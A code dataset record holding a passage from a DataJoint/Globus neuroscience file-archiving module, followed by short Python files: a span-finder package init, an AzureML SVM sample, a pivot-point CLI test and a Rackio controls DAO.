Skipping.'.format( ds_key)) return DataSet.insert1({**ds_key, 'dataset_type': ds_type}, allow_direct_insert=True) # ArchivedSession as_key = {k: v for k, v in smap[skey].items() if k in ArchivedSession.primary_key} ArchivedSession.insert1( {**as_key, 'globus_alias': globus_alias}, allow_direct_insert=True, skip_duplicates=True) for p in ptmap: # ArchivedRawEphys ep_key = {**as_key, **ds_key, 'probe_folder': p} ArchivedRawEphys.insert1(ep_key, allow_direct_insert=True) for t in ptmap[p]: for f in ptmap[p][t]: DataSet.PhysicalFile.insert1( {**ds_key, **f}, allow_direct_insert=True, ignore_extra_fields=True) ArchivedRawEphys.RawEphysTrial.insert1( {**ep_key, **ds_key, 'trial': t, 'file_subpath': f['file_subpath']}, allow_direct_insert=True) elif all('concat' in f for f in ftypes): raise NotImplementedError('concatenated not yet implemented') else: log.info('skipping. mixed filetypes detected') return gsm = self.get_gsm() gsm.activate_endpoint(rep) for ep, dirname, node in gsm.fts('{}:{}'.format(rep, rep_sub)): log.debug('checking: {}:{}/{}'.format( ep, dirname, node.get('name', ''))) edir = re.match('([a-z]+[0-9]+)/([0-9]{8})/([0-9]+)', dirname) if not edir or node['DATA_TYPE'] != 'file': continue log.debug('dir match: {}'.format(dirname)) h2o, sdate, probe = edir[1], edir[2], edir[3] skey_i = '{}/{}'.format(h2o, sdate) if skey_i != skey: if skey and skey in smap: with dj.conn().transaction: try: commit(skey, sfiles) except Exception as e: log.error( 'Exception {} committing {}. files: {}'.format( repr(e), skey, sfiles)) skey, sfiles = skey_i, [] if skey not in smap: if skey not in sskip: log.debug('session {} not known. skipping.'.format(skey)) sskip.add(skey) continue fname = node['name'] log.debug('found file {}'.format(fname)) if '.' not in fname: log.debug('skipping {} - no dot in fname'.format(fname)) continue froot, fext = fname.split('.', 1) ftype = {g['file_type']: g for g in ftmap.values() if fnmatch(fname, g['file_glob'])} if len(ftype) != 1: log.debug('skipping {} - incorrect type matches: {}'.format( fname, ftype)) continue ftype = next(iter(ftype.values()))['file_type'] trial = None if 'trial' in ftype: trial = int(froot.split('_t')[1]) file_subpath = '{}/{}'.format(dirname, fname) sfiles.append({'water_restriction_number': h2o, 'session_date': '{}-{}-{}'.format( sdate[:4], sdate[4:6], sdate[6:]), 'probe': int(probe), 'trial': int(trial), 'file_subpath': file_subpath, 'file_type': ftype}) if skey: with dj.conn().transaction: commit(skey, sfiles) def make(self, key): """ discover files in local endpoint and transfer/register """ log.debug(key) globus_alias = 'raw-ephys' le = GlobusStorageLocation.local_endpoint(globus_alias) lep, lep_sub, lep_dir = (le['endpoint'], le['endpoint_subdir'], le['endpoint_path']) re, rep, rep_sub = (GlobusStorageLocation() & {'globus_alias': globus_alias}).fetch1().values() log.info('local_endpoint: {}:{} -> {}'.format(lep, lep_sub, lep_dir)) # Get session related information needed for filenames/records sinfo = (lab.WaterRestriction * lab.Subject.proj() * experiment.Session() & key).fetch1() tinfo = ((lab.WaterRestriction * lab.Subject.proj() * experiment.Session() * experiment.SessionTrial) & key).fetch() h2o = sinfo['water_restriction_number'] sdate = sinfo['session_date'] subdir = pathlib.Path(h2o, str(sdate).replace('-', '')) # + probeno lep_subdir = pathlib.Path(lep_dir, subdir) probechoice = [str(i) for i in range(1, 10)] # XXX: hardcoded file_globs = {i['file_glob']: i['file_type'] for i in FileType & "file_type like 'ephys%%'"} # Process each 
probe folder for lep_probedir in lep_subdir.glob('*'): lep_probe = str(lep_probedir.relative_to(lep_subdir)) if lep_probe not in probechoice: log.info('skipping lep_probedir: {} - unexpected name'.format( lep_probedir)) continue lep_matchfiles = {} lep_probefiles = lep_probedir.glob('*.*') for pf in lep_probefiles: pfbase = pf.relative_to(lep_probedir) pfmatch = {k: pfbase.match(k) for k in file_globs} if any(pfmatch.values()): log.debug('found valid file: {}'.format(pf)) lep_matchfiles[pf] = tuple(k for k in pfmatch if pfmatch[k]) else: log.debug('skipping non-match file: {}'.format(pf)) continue # Build/Validate file records if not all([len(lep_matchfiles[i]) == 1 for i in lep_matchfiles]): # TODO: handle trial + concatenated match case... log.warning('files matched multiple types'.format( lep_matchfiles)) continue type_to_file = {file_globs[lep_matchfiles[mf][0]]: mf for mf in lep_matchfiles} ds_key, ds_name, ds_files, ds_trials = ( None, None, None, [], []) if all(['trial' in t for t in type_to_file]): dataset_type = 'ephys-raw-trialized' ds_name = '{}_{}_{}'.format(h2o, sdate.isoformat(), dataset_type) ds_key = {'dataset_name': ds_name, 'globus_storage_location': globus_alias} for t in type_to_file: fsp = type_to_file[t].relative_to(lep_dir) dsf = {**ds_key, 'file_subpath': str(fsp)} # e.g : 'tw34_g0_t0.imec.ap.meta' -> *_t(trial).* trial = int(fsp.name.split('_t')[1].split('.')[0]) if trial not in tinfo['trial']: log.warning('unknown trial file: {}. skipping'.format( dsf)) continue ds_trials.append({**dsf, 'trial': trial}) ds_files.append({**dsf, 'file_type': t}) elif all(['concat' in t for t in type_to_file]): dataset_type = 'ephys-raw-continuous' ds_name = '{}_{}_{}'.format(h2o, sdate.isoformat(), dataset_type) ds_key = {'dataset_name': ds_name, 'globus_storage_location': globus_alias} for t in type_to_file: fsp = type_to_file[t].relative_to(lep_dir) ds_files.append({**ds_key, 'file_subpath': str(fsp), 'file_type': t}) else: log.warning("couldn't determine dataset type for {}".format( lep_probedir)) continue # Transfer Files gsm = self.get_gsm() gsm.activate_endpoint(lep) # XXX: cache / prevent duplicate RPC? gsm.activate_endpoint(rep) # XXX: cache / prevent duplicate RPC? DataSet.insert1({**ds_key, 'dataset_type': dataset_type}, allow_direct_insert=True) for f in ds_files: fsp = ds_files[f]['file_subpath'] srcp = '{}:{}/{}'.format(lep, lep_sub, fsp) dstp = '{}:{}/{}'.format(rep, rep_sub, fsp) log.info('transferring {} to {}'.format(srcp, dstp)) # XXX: check if exists 1st? 
if not gsm.cp(srcp, dstp): emsg = "couldn't transfer {} to {}".format(srcp, dstp) log.error(emsg) raise dj.DataJointError(emsg) DataSet.PhysicalFile.insert1({**ds_key, **ds_files[f]}, allow_direct_insert=True) # Add Records ArchivedSession.insert1( {**key, 'globus_storage_location': globus_alias}, skip_duplicates=True, allow_direct_insert=True) ArchivedRawEphys.insert1( {**key, **ds_key, 'probe_folder': int(str(lep_probe))}, allow_direct_insert=True) if dataset_type == 'ephys-raw-trialized': ArchivedRawEphys.ArchivedTrials.insert( [{**key, **t} for t in ds_trials], allow_direct_insert=True) @classmethod def retrieve(cls): self = cls() for key in self: self.retrieve1(key) @classmethod def retrieve1(cls, key): ''' retrieve related files for a given key ''' self = cls() raise NotImplementedError('retrieve not yet implemented') # Old / to be updated: # >>> list(key.keys()) # ['subject_id', 'session', 'trial', 'electrode_group', 'globus_alia log.debug(key) lep, lep_sub, lep_dir = GlobusStorageLocation().local_endpoint log.info('local_endpoint: {}:{} -> {}'.format(lep, lep_sub, lep_dir)) # get session related information needed for filenames/records sinfo = ((lab.WaterRestriction * lab.Subject.proj() * experiment.Session() * experiment.SessionTrial) & key).fetch1() h2o = sinfo['water_restriction_number'] sdate = sinfo['session_date'] eg = key['electrode_group'] trial = key['trial'] # build file locations: # fpat: base file pattern for this sessions files # gbase: globus-url base path for this sessions files fpat = '{}_{}_{}_g0_t{}'.format(h2o, sdate, eg, trial) gbase = '/'.join((h2o, str(sdate), str(eg), fpat)) repname, rep, rep_sub = (GlobusStorageLocation() & key).fetch()[0] gsm = self.get_gsm() gsm.activate_endpoint(lep) # XXX: cache this / prevent duplicate RPC? gsm.activate_endpoint(rep) # XXX: cache this / prevent duplicate RPC? sfxmap = {'.imec.ap.bin': ArchivedRawEphysTrial.ArchivedApChannel, '.imec.ap.meta': ArchivedRawEphysTrial.ArchivedApMeta, '.imec.lf.bin': ArchivedRawEphysTrial.ArchivedLfChannel, '.imec.lf.meta': ArchivedRawEphysTrial.ArchivedLfMeta} for sfx, cls in sfxmap.items(): if cls & key: log.debug('record found for {} & {}'.format(cls.__name__, key)) gname = '{}{}'.format(gbase, sfx) srcp = '{}:/{}/{}'.format(rep, rep_sub, gname) dstp = '{}:/{}/{}'.format(lep, lep_sub, gname) log.info('transferring {} to {}'.format(srcp, dstp)) # XXX: check if exists 1st? (manually or via API copy-checksum) if not gsm.cp(srcp, dstp): emsg = "couldn't transfer {} to {}".format(srcp, dstp) log.error(emsg) raise dj.DataJointError(emsg) @schema class ArchivedSortedEphys(dj.Imported): definition = """ -> ArchivedSession -> DataSet probe_folder: tinyint --- sorting_time=null: datetime """ key_source = experiment.Session def make(self, key): """ discover files in local endpoint and transfer/register """ raise NotImplementedError('ArchivedSortedEphys.make to be implemented') @schema class ArchivedTrackingVideo(dj.Imported): ''' ArchivedTrackingVideo storage Note: video_file_name tracked here as trial->file map is non-deterministic Directory locations of the form: {Water restriction number}\{Session Date}\video with file naming convention of the form: {Water restriction number}_{camera-position-string}_NNN-NNNN.avi Where 'NNN' is determined from the 'tracking map file' which maps trials to videos as outlined in tracking.py XXX: Using key-source based loookup as is currently done, may have trials for which there is no tracking, so camera cannot be determined to do file lookup, thus videos are missed. 
This could be resolved via schema adjustment, or file-traversal based 'opportunistic' registration strategy. ''' definition = """ -> ArchivedSession -> tracking.TrackingDevice --- -> DataSet """ key_source = tracking.TrackingDevice * experiment.Session ingest = None # ingest module reference gsm = None # for GlobusStorageManager class TrialVideo(dj.Part): definition = """ -> master -> experiment.SessionTrial --- -> DataSet.PhysicalFile """ @classmethod def get_ingest(cls): ''' return tracking_ingest module not imported globally to prevent ingest schema creation for client case ''' log.debug('ArchivedVideoFile.get_ingest()') if cls.ingest is None: from .ingest import tracking as tracking_ingest cls.ingest = tracking_ingest return cls.ingest def get_gsm(self): log.debug('ArchivedVideoFile.get_gsm()') if self.gsm is None: self.gsm = GlobusStorageManager() self.gsm.wait_timeout = PUBLICATION_TRANSFER_TIMEOUT return self.gsm @classmethod def discover(cls): """ discover files on globus and attempt to register them """ self = cls() globus_alias = 'raw-video' le = GlobusStorageLocation.local_endpoint(globus_alias) lep, lep_sub, lep_dir = (le['endpoint'], le['endpoint_subdir'], le['endpoint_path']) ra, rep, rep_sub = (GlobusStorageLocation() & {'globus_alias': globus_alias}).fetch1().values() smap = {'{}/{}'.format(s['water_restriction_number'], s['session_date']).replace('-', ''): s for s in (experiment.Session() * (lab.WaterRestriction() * lab.Subject.proj()))} tpos_dev = {s['tracking_position']: s['tracking_device'] for s in tracking.TrackingDevice()} # position:device ftmap = {t['file_type']: t for t in (FileType() & "file_type like 'tracking%%'")} skey = None sskip = set() sfiles = [] # {file_subpath:, trial:, file_type:,} gsm = self.get_gsm() gsm.activate_endpoint(lep) gsm.activate_endpoint(rep) def commit(skey, sfiles): log.info('commit. skey: {}'.format(skey)) if not sfiles: log.info('commit skipping {}. no files in set'.format(skey)) # log.debug('sfiles: {}'.format(sfiles)) h2o, sdate, ftypes = set(), set(), set() dftmap = {} # device:file:trial via load_campath mapping files dvfmap = defaultdict(lambda: defaultdict(list)) # device:video:file dtfmap = defaultdict(lambda: defaultdict(list)) # device:trial:file for s in sfiles: if s['file_type'] == 'tracking-video-trial': dvfmap[s['position']][s['video']].append(s) h2o.add(s['water_restriction_number']) sdate.add(s['session_date']) ftypes.add(s['file_type']) if s['file_type'] == 'tracking-video-map': # xfer & load camera:trial map ex: dl55_20190108_side.txtb fsp = s['file_subpath'] lsp = '/tmp/' + s['file_subpath'].split('/')[-1] srcp = '{}:{}/{}'.format(rep, rep_sub, fsp) dstp = '{}:{}/{}'.format(lep, lep_sub, lsp) log.info('transferring {} to {}'.format(srcp, dstp)) if not gsm.cp(srcp, dstp): # XXX: check if exists 1st? emsg = "couldn't transfer {} to {}".format(srcp, dstp) log.error(emsg) raise dj.DataJointError(emsg) lfname = lep_dir + lsp # local filesysem copy location dftmap[s['position']] = TrackingIngest.load_campath(lfname) if len(h2o) != 1 or len(sdate) != 1: log.info('skipping. 
bad h2o {} or session date {}'.format( h2o, sdate)) return h2o, sdate = next(iter(h2o)), next(iter(sdate)) for d in dvfmap: if d in dftmap: # remap video no -> trial dtfmap[d] = {dftmap[d][v]: dict(dvfmap[d][v], trial=dftmap[d][v]) for v in dvfmap[d]} else: # assign video no -> trial dtfmap[d] = {k: dict(v, trial=v['video']) for k, v in dvfmap[d].items()} # DataSet ds_type = 'tracking-video' ds_name = '{}_{}_{}'.format(h2o, sdate, ds_type) ds_key = {'dataset_name': ds_name, 'globus_alias': globus_alias} if (DataSet & ds_key): log.info('DataSet: {} already exists. Skipping.'.format( ds_key)) return DataSet.insert1({**ds_key, 'dataset_type': ds_type}, allow_direct_insert=True) # ArchivedSession as_key = {k: v for k, v in smap[skey].items() if k in ArchivedSession.primary_key} ArchivedSession.insert1( {**as_key, 'globus_alias': globus_alias}, allow_direct_insert=True, skip_duplicates=True) for d in dtfmap: # ArchivedTrackingVideo atv_key = {**as_key, **ds_key, 'tracking_device': tpos_dev[d]} ArchivedTrackingVideo.insert1( atv_key, allow_direct_insert=True) for t in dtfmap[d]: for f in dtfmap[d][t]: DataSet.PhysicalFile.insert1( {**ds_key, **f}, allow_direct_insert=True, ignore_extra_fields=True) ArchivedTrackingVideo.TrialVideo.insert1( {**atv_key, **ds_key, 'trial': t, 'file_subpath': f['file_subpath']}, allow_direct_insert=True) # end commit() for ep, dirname, node in gsm.fts('{}:{}'.format(rep, rep_sub)): vdir = re.match('([a-z]+[0-9]+)/([0-9]{8})/video', dirname) if not vdir or node['DATA_TYPE'] != 'file': continue h2o, sdate = vdir[1], vdir[2] skey_i = '{}/{}'.format(h2o, sdate) if skey_i != skey: if skey and skey in smap: with dj.conn().transaction: try: commit(skey, sfiles) except Exception as e: log.error( 'Exception {} committing {}. files: {}'.format( repr(e), skey, sfiles)) skey, sfiles = skey_i, [] if skey not in smap: if skey not in sskip: log.debug('session {} not known. skipping'.format(skey)) sskip.add(skey) continue fname = node['name'] log.debug('checking {}/{}'.format(dirname, fname)) if '.' not in fname: log.debug('skipping {} - no dot in fname'.format(fname)) continue froot, fext = fname.split('.', 1) ftype = {g['file_type']: g for g in ftmap.values() if fnmatch(fname, g['file_glob'])} if len(ftype) != 1: log.debug('skipping {} - incorrect type matches: {}'.format( fname, ftype)) continue ftype = next(iter(ftype.values()))['file_type'] log.debug('processing as {}'.format(ftype)) file_subpath = '{}/{}'.format(dirname, fname) if ftype == 'tracking-video-map': # e.g. dl55_20190108_side.txt h2o_f, fdate, pos = froot.split('_') sfiles.append({'water_restriction_number': h2o, 'session_date': '{}-{}-{}'.format( sdate[:4], sdate[4:6], sdate[6:]), 'position': pos, 'file_subpath': file_subpath, 'file_type': ftype}) else: # tracking-video-map # e.g. 
dl41_side_998-0000.avi or dl41_side_998-0000_00.avi h2o_f, pos, video = froot.replace('-', '_').split('_')[:3] sfiles.append({'water_restriction_number': h2o, 'session_date': '{}-{}-{}'.format( sdate[:4], sdate[4:6], sdate[6:]), 'position': pos, 'video': int(video), 'file_subpath': file_subpath, 'file_type': ftype}) def make(self, key): """ discover files in local endpoint and transfer/register """ log.info('ArchivedVideoFile.make(): {}'.format(key)) # {'tracking_device': 'Camera 0', 'subject_id': 432572, 'session': 1} globus_alias = 'raw-video' le = GlobusStorageLocation.local_endpoint(globus_alias) lep, lep_sub, lep_dir = (le['endpoint'], le['endpoint_subdir'], le['endpoint_path']) re = (GlobusStorageLocation & {'globus_alias': globus_alias}).fetch1() rep, rep_sub = re['globus_endpoint'], re['globus_path'] log.info('local_endpoint: {}:{} -> {}'.format(lep, lep_sub, lep_dir)) log.info('remote_endpoint: {}:{}'.format(rep, rep_sub)) h2o = (lab.WaterRestriction & key).fetch1('water_restriction_number') session = (experiment.Session & key).fetch1() sdate = session['session_date'] sdate_sml = "{}{:02d}{:02d}".format(sdate.year, sdate.month, sdate.day) dev = (tracking.TrackingDevice & key).fetch1() trls = (experiment.SessionTrial & key).fetch( order_by='trial', as_dict=True) tracking_ingest = self.get_ingest() tdev = dev['tracking_device'] # NOQA: notused tpos = dev['tracking_position'] camtrial = '{}_{}_{}.txt'.format(h2o, sdate_sml, tpos) vbase = pathlib.Path(lep_dir, h2o, sdate_sml, 'video') campath = vbase / camtrial if not campath.exists(): # XXX: uses 1st found log.warning('trial map {} n/a! skipping.'.format(campath)) return log.info('loading trial map: {}'.format(campath)) vmap = {v: k for k, v in tracking_ingest.TrackingIngest.load_campath(campath).items()} log.debug('loaded video map: {}'.format(vmap)) # add ArchivedSession as_key = {k: v for k, v in key.items() if k in experiment.Session.primary_key} as_rec = {**as_key, 'globus_alias': globus_alias} ArchivedSession.insert1(as_rec, allow_direct_insert=True, skip_duplicates=True) # add DataSet ds_type = 'tracking-video' ds_name = '{}_{}_{}_{}'.format(h2o, sdate.isoformat(), ds_type, tpos) ds_key = {'globus_alias': globus_alias, 'dataset_name': ds_name} ds_rec = {**ds_key, 'dataset_type': ds_type} DataSet.insert1(ds_rec, allow_direct_insert=True) # add ArchivedVideoTracking vt_key = {**as_key, 'tracking_device': tdev} vt_rec = {**vt_key, 'globus_alias': globus_alias, 'dataset_name': ds_name} self.insert1(vt_rec) filetype = 'tracking-video-trial' for t in trls: trial = t['trial'] log.info('.. tracking trial {} ({})'.format(trial, t)) if t['trial'] not in vmap: log.warning('trial {} not in video map. skipping!'.format(t)) continue vmatch = '{}_{}_{}-*'.format(h2o, tpos, vmap[trial]) log.debug('vbase: {}, vmatch: {}'.format(vbase, vmatch)) vglob = list(vbase.glob(vmatch)) if len(vglob) != 1: emsg = 'incorrect videos found in {}: {}'.format(vbase, vglob) log.warning(emsg) raise dj.DataJointError(emsg) vfile = vglob[0].name gfile = '{}/{}/{}/{}'.format( h2o, sdate_sml, 'video', vfile) # subpath srcp = '{}:{}/{}'.format(lep, lep_sub, gfile) # source path dstp = '{}:{}/{}'.format(rep, rep_sub, gfile) # dest path gsm = self.get_gsm() gsm.activate_endpoint(lep) # XXX: cache / prevent duplicate RPC? gsm.activate_endpoint(rep) # XXX: cache / prevent duplicate RPC? 
log.info('transferring {} to {}'.format(srcp, dstp)) if not gsm.cp(srcp, dstp): emsg = "couldn't transfer {} to {}".format(srcp, dstp) log.error(emsg) raise dj.DataJointError(emsg) pf_key = {**ds_key, 'file_subpath': vfile} pf_rec = {**pf_key, 'file_type': filetype} DataSet.PhysicalFile.insert1({**pf_rec}, allow_direct_insert=True) trk_key = {k: v for k, v in {**key, 'trial': trial}.items() if k in experiment.SessionTrial.primary_key} tv_rec = {**vt_key, **trk_key, **pf_key} self.TrialVideo.insert1({**tv_rec}) def test_flist(fname='globus-index-full.txt'): ''' spoof tester for discover methods expects: f: ep:/path/to/file d: ep:/path/to/direct etc. (aka: globus-shell 'find' output) replace the line: for ep, dirname, node in gsm.fts('{}:{}'.format(rep, rep_sub)): with: for ep, dirname, node in test_flist('globus-list.txt'): to test against the file 'globus-list.txt' ''' with open(fname, 'r') as infile: for l in infile: try: t, fp = l.split(' ') fp = fp.split(':')[1].lstrip('/').rstrip('\n') dn, bn = os.path.split(fp) if t == 'f:': yield ('ep', dn, {'DATA_TYPE': 'file', 'name': bn}) else: yield ('ep', dn, {'DATA_TYPE': 'dunno', 'path': bn}) except ValueError as e: if 'too many values' in repr(e): pass
11,374
13,905
243
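The test_flist helper in the record above spoofs a Globus listing by parsing lines of the form "f: ep:/path/to/file" or "d: ep:/path/to/dir" and yielding the same (endpoint, dirname, node) tuples that gsm.fts() produces. A minimal, self-contained sketch of that parsing step follows; the sample lines and the parse_listing name are illustrative, not part of the original pipeline.

import os

# Hypothetical sample of globus-shell 'find' output, in the format described
# by test_flist's docstring ("f: ep:/path/to/file", "d: ep:/path/to/dir").
sample_listing = [
    "f: ep:/dl41/20190101/video/dl41_side_1-0000.avi",
    "d: ep:/dl41/20190101/video",
]


def parse_listing(lines):
    # Yield (endpoint, dirname, node) tuples shaped like gsm.fts() output.
    for line in lines:
        try:
            kind, path = line.split(' ')
            path = path.split(':')[1].lstrip('/').rstrip('\n')
            dirname, basename = os.path.split(path)
            if kind == 'f:':
                yield ('ep', dirname, {'DATA_TYPE': 'file', 'name': basename})
            else:
                yield ('ep', dirname, {'DATA_TYPE': 'dunno', 'path': basename})
        except ValueError:
            continue  # skip lines that do not split into exactly two fields


for ep, dirname, node in parse_listing(sample_listing):
    print(ep, dirname, node)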
4d8532ecf10ba04d9280c47b5810edf61e1c76f0
311
py
Python
sftp/__init__.py
hiaoxui/span-finder
c5f9886eae12921796b33bdb84ffcb6bfa905cb4
[ "Apache-2.0" ]
3
2021-05-08T15:35:21.000Z
2022-01-24T02:52:55.000Z
sftp/__init__.py
hiaoxui/span-finder
c5f9886eae12921796b33bdb84ffcb6bfa905cb4
[ "Apache-2.0" ]
null
null
null
sftp/__init__.py
hiaoxui/span-finder
c5f9886eae12921796b33bdb84ffcb6bfa905cb4
[ "Apache-2.0" ]
1
2021-09-07T22:31:40.000Z
2021-09-07T22:31:40.000Z
from .data_reader import (
    BetterDatasetReader, SRLDatasetReader
)
from .metrics import SRLMetric, BaseF, ExactMatch, FBetaMixMeasure
from .models import SpanModel
from .modules import (
    MLPSpanTyping, SpanTyping, SpanFinder, BIOSpanFinder
)
from .predictor import SpanPredictor
from .utils import Span
28.272727
66
0.807074
from .data_reader import (
    BetterDatasetReader, SRLDatasetReader
)
from .metrics import SRLMetric, BaseF, ExactMatch, FBetaMixMeasure
from .models import SpanModel
from .modules import (
    MLPSpanTyping, SpanTyping, SpanFinder, BIOSpanFinder
)
from .predictor import SpanPredictor
from .utils import Span
0
0
0
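The sftp/__init__.py above only re-exports the package's public names, so downstream code can import them from the package root instead of the individual submodules. A one-line usage sketch, assuming the span-finder package is installed as sftp:

# Equivalent to importing sftp.predictor.SpanPredictor and sftp.utils.Span directly.
from sftp import SpanPredictor, Span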
31ae962fdd5c782121ff85fe6854a2b889e2cbfd
2,334
py
Python
docs/source/examples/7/sample.py
kumar-pratik/hi-ml
a108cf4ea244a76127adedc0ca60f0a5afdfb3e8
[ "MIT" ]
34
2021-08-18T13:27:36.000Z
2022-03-26T01:25:36.000Z
docs/source/examples/7/sample.py
kumar-pratik/hi-ml
a108cf4ea244a76127adedc0ca60f0a5afdfb3e8
[ "MIT" ]
111
2021-08-18T13:19:46.000Z
2022-03-30T05:57:01.000Z
docs/source/examples/7/sample.py
kumar-pratik/hi-ml
a108cf4ea244a76127adedc0ca60f0a5afdfb3e8
[ "MIT" ]
6
2021-09-13T12:07:58.000Z
2022-03-24T16:31:06.000Z
# ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
# From:
# https://github.com/Azure/MachineLearningNotebooks/blob/master/how-to-use-azureml/ml-frameworks/scikit-learn/train-hyperparameter-tune-deploy-with-sklearn/train_iris.py
import argparse
from pathlib import Path

import numpy as np
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split

from health_azure import submit_to_azure_if_needed


if __name__ == "__main__":
    main()
39.559322
169
0.654242
# ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
# From:
# https://github.com/Azure/MachineLearningNotebooks/blob/master/how-to-use-azureml/ml-frameworks/scikit-learn/train-hyperparameter-tune-deploy-with-sklearn/train_iris.py
import argparse
from pathlib import Path

import numpy as np
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split

from health_azure import submit_to_azure_if_needed


def main() -> None:
    run_info = submit_to_azure_if_needed(
        compute_cluster_name="lite-testing-ds2",
        default_datastore="himldatasets",
        input_datasets=["himl_sample7_input"],
        wait_for_completion=True,
        wait_for_completion_show_output=True)

    parser = argparse.ArgumentParser()
    parser.add_argument('--kernel', type=str, default='linear',
                        help='Kernel type to be used in the algorithm')
    parser.add_argument('--penalty', type=float, default=1.0,
                        help='Penalty parameter of the error term')
    args = parser.parse_args()

    print(f'Kernel type:{args.kernel}')
    print(f'Penalty: {args.penalty}')

    # X -> features, y -> label
    input_folder = run_info.input_datasets[0] or Path("dataset")
    X = np.loadtxt(fname=input_folder / "X.csv", delimiter=',', skiprows=1)
    y = np.loadtxt(fname=input_folder / "y.csv", dtype='str', delimiter=',', skiprows=1)

    # dividing X, y into train and test data
    X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)

    # training a linear SVM classifier
    from sklearn.svm import SVC
    svm_model_linear = SVC(kernel=args.kernel, C=args.penalty).fit(X_train, y_train)
    svm_predictions = svm_model_linear.predict(X_test)

    # model accuracy for X_test
    accuracy = svm_model_linear.score(X_test, y_test)
    print('Accuracy of SVM classifier on test set: {:.2f}'.format(accuracy))

    # creating a confusion matrix
    cm = confusion_matrix(y_test, svm_predictions)
    print(cm)


if __name__ == "__main__":
    main()
1,536
0
23
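The sample above wraps a small scikit-learn SVM run in argument parsing and an AzureML submission via submit_to_azure_if_needed. A local-only sketch of just the train/evaluate part, using scikit-learn's bundled iris data in place of the CSV inputs; the kernel and penalty values are illustrative defaults, not taken from a real run:

# Local-only sketch: same scikit-learn calls as the sample above, but without
# health_azure, argparse, or CSV files; the iris data ships with scikit-learn.
from sklearn.datasets import load_iris
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC

X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)

model = SVC(kernel="linear", C=1.0).fit(X_train, y_train)
predictions = model.predict(X_test)

print("Accuracy of SVM classifier on test set: {:.2f}".format(model.score(X_test, y_test)))
print(confusion_matrix(y_test, predictions))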
6599733b0213579573a907d9fc5ab78c8a716ed8
510
py
Python
tests/test_cli.py
vfranca/pp
db9e15a490e5b28a177cdcd8f448d21fd5bec8d7
[ "MIT" ]
null
null
null
tests/test_cli.py
vfranca/pp
db9e15a490e5b28a177cdcd8f448d21fd5bec8d7
[ "MIT" ]
null
null
null
tests/test_cli.py
vfranca/pp
db9e15a490e5b28a177cdcd8f448d21fd5bec8d7
[ "MIT" ]
null
null
null
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import unittest
from click.testing import CliRunner
from pivotpoint import pp
from pivotpoint import cli
26.842105
74
0.668627
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import unittest
from click.testing import CliRunner
from pivotpoint import pp
from pivotpoint import cli


class TestPivotPoint(unittest.TestCase):

    def setUp(self):
        self.runner = CliRunner()

    def tearDown(self):
        """Tear down test fixtures, if any."""

    def test_command_line_interface(self):
        result = self.runner.invoke(cli.main, ["34.80", "32.80", "33.40"])
        assert "35.67\n34.54\n33.67\n32.54\n31.67\n" in result.output
191
144
23
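The expected CLI output in the test above is consistent with the classic floor-trader pivot formula, with the pivot rounded to two decimals before the derived levels are computed: P = (H + L + C) / 3, R1 = 2P - L, S1 = 2P - H, R2 = P + (H - L), S2 = P - (H - L), printed in the order R2, R1, P, S1, S2. A standalone sketch that reproduces those numbers (the function name is illustrative; the real logic lives inside the pivotpoint package):

# Standalone sketch of the pivot levels the CLI test above asserts, for
# high=34.80, low=32.80, close=33.40. The pivot is rounded to two decimals
# before the other levels are derived, which is what the expected strings
# imply; pivot_levels is an illustrative name, not the package's API.
def pivot_levels(high, low, close):
    pivot = round((high + low + close) / 3.0, 2)
    r1, s1 = 2 * pivot - low, 2 * pivot - high
    r2, s2 = pivot + (high - low), pivot - (high - low)
    return r2, r1, pivot, s1, s2


for level in pivot_levels(34.80, 32.80, 33.40):
    print("{:.2f}".format(level))
# prints 35.67, 34.54, 33.67, 32.54, 31.67 in order, matching the test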
6c59951f383e22b4b6dd672512b717c4ad1ef094
1,086
py
Python
rackio/dao/controls.py
crivero7/rackio-framework
d3362041b1fc4c3af7eb51ac06b1f0f1b5aa497c
[ "MIT" ]
null
null
null
rackio/dao/controls.py
crivero7/rackio-framework
d3362041b1fc4c3af7eb51ac06b1f0f1b5aa497c
[ "MIT" ]
null
null
null
rackio/dao/controls.py
crivero7/rackio-framework
d3362041b1fc4c3af7eb51ac06b1f0f1b5aa497c
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*-
"""rackio/dao/controls.py

This module implements Controls Data Objects Access.
"""
from .core import RackioDAO
18.40678
52
0.57919
# -*- coding: utf-8 -*-
"""rackio/dao/controls.py

This module implements Controls Data Objects Access.
"""
from .core import RackioDAO


class ControlsDAO(RackioDAO):

    def get_all(self):
        app = self.get_app()
        manager = app.get_manager("control")

        result = list()
        for control in manager.get_controls():
            result.append(control.serialize())

        return result

    def get(self, name):
        app = self.get_app()
        manager = app.get_manager("control")

        control = manager.get_control(name)
        if control:
            return control.serialize()


class RulesDAO(RackioDAO):

    def get_all(self):
        app = self.get_app()
        manager = app.get_manager("control")

        result = list()
        for rule in manager.get_rules():
            result.append(rule.serialize())

        return result

    def get(self, name):
        app = self.get_app()
        manager = app.get_manager("control")

        rule = manager.get_rule(name)
        if rule:
            return rule.serialize()
777
13
158
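Both DAOs above follow the same shape: fetch the control manager from the app, then return serialize() output for every item, or for a single item looked up by name. A framework-free sketch of that pattern (Control and ControlManager below are hypothetical stand-ins, not Rackio classes):

# Hypothetical stand-ins illustrating the serialize-all DAO pattern above;
# these are minimal stubs, not part of the Rackio framework.
class Control:

    def __init__(self, name, value):
        self.name, self.value = name, value

    def serialize(self):
        return {"name": self.name, "value": self.value}


class ControlManager:

    def __init__(self, controls):
        self._controls = {c.name: c for c in controls}

    def get_controls(self):
        return list(self._controls.values())

    def get_control(self, name):
        return self._controls.get(name)


def get_all(manager):
    # same shape as ControlsDAO.get_all: serialize everything the manager holds
    return [control.serialize() for control in manager.get_controls()]


manager = ControlManager([Control("C1", 10), Control("C2", 20)])
print(get_all(manager))                       # list of serialized controls
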